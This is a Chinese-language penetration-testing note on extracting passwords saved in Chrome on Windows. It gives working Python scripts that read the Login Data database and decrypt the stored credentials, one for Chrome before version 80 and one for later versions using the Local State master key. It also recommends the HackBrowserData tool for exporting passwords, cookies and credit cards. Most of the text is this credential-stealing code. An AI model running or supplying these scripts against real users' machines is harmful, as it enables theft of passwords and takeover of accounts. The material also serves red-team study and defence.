Chrome浏览器导出
Chrome浏览器保存密码的方式
用户可以在chrome中保存密码,当需要输入对应网站的账号密码时可以自动填充。
chrome保存的密码可以在自定义及控制选项中的设置中找到:
Chrome中保存的密码先被二次加密,然后被保存在SQLite数据库文件中,位置如下:
%LocalAppData%\Google\Chrome\User Data\Default\Login Data
实际测试
使用工具读取数据库文件,测试工具:SQLiteStudio
SQLiteStudio开源,特点是支持查看十六进制数据(SQLiteSpy不支持查看十六机制数据)
利用python导出chrome密码
用python实现读取SQLite数据库文件:
1
2
3
4
5
6
7
8
9
10
11
|
from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect(getenv("APPDATA") + "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data")
cursor = conn.cursor()
cursor.execute('select action_url, username_value, password_value from logins')
for result in cursor.fetchall():
print(binascii.b2a_hex(result[2]))
|
输出二次加密的用户密码
找到chromium开源代码中对用户密码二次加密的方法:Windows APICryptProtectData()实现
参考加密代码:
1
|
https://github.com/scheib/chromium/blob/eb7e2441dd8878f733e43799ea77c2bab66816d3/chrome/browser/password_manager/password_store_win_unittest.cc#L107
|
关于CryptProtectData()函数的文档:
1
|
https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx
|
根据文档可知:
- 对应解密函数为CryptUnprotectData;
- 只有与加密数据的用户具有相同登录凭据的用户才能解密数据;
所以只有在当前用户的凭据下才能解密数据,而且对于不同版本的Chrome有不同的解密方法
Chrome Version < 80
1
2
3
4
5
6
7
8
9
10
|
from os import getenv
import sqlite3
import win32crypt
import binascii
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
print password
|
Chrome Version > 80
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
|
import os
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
def get_master_key():
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_password(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypt_pass = decrypt_payload(cipher, payload)
decrypt_pass = decrypt_pass[:-16].decode()
return decrypt_pass
except Exception as e:
return "Chrome < 80"
os.environ["PYTHONIOENCODING"] = 'utf-8'
master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
try:
cursor.execute("select action_url, username_value, password_value from logins")
for r in cursor.fetchall():
url = r[0]
username = r[1]
encrypt_password = r[2]
decrypt_password = decrypt_password(encrypt_password, master_key)
if len(username) > 0:
print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypt_password + "\n" + "*" * 50 + "\n")
except Exception as e:
pass
cursor.close()
conn.close()
try:
os.remove("Loginvault.db")
except Exception as e:
pass
|
注:
如果Chrome正在运行,无法查询数据库Login Data,会显示sqlite3.OperationalError: database is locked
HackBrowserData导出
1
2
|
HackBrowserData是一个浏览器数据(密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件)的导出工具,支持全平台主流浏览器。
-- Github
|
可以双击直接运行HackBrowserData,会直接自动导出所有相关信息;也可以使用命令行调用相应命令。
results目录里面就存放所有已经被导出的信息
参考链接
- https://github.com/moonD4rk/HackBrowserData/blob/master/README_ZH.md
- https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81
- https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81
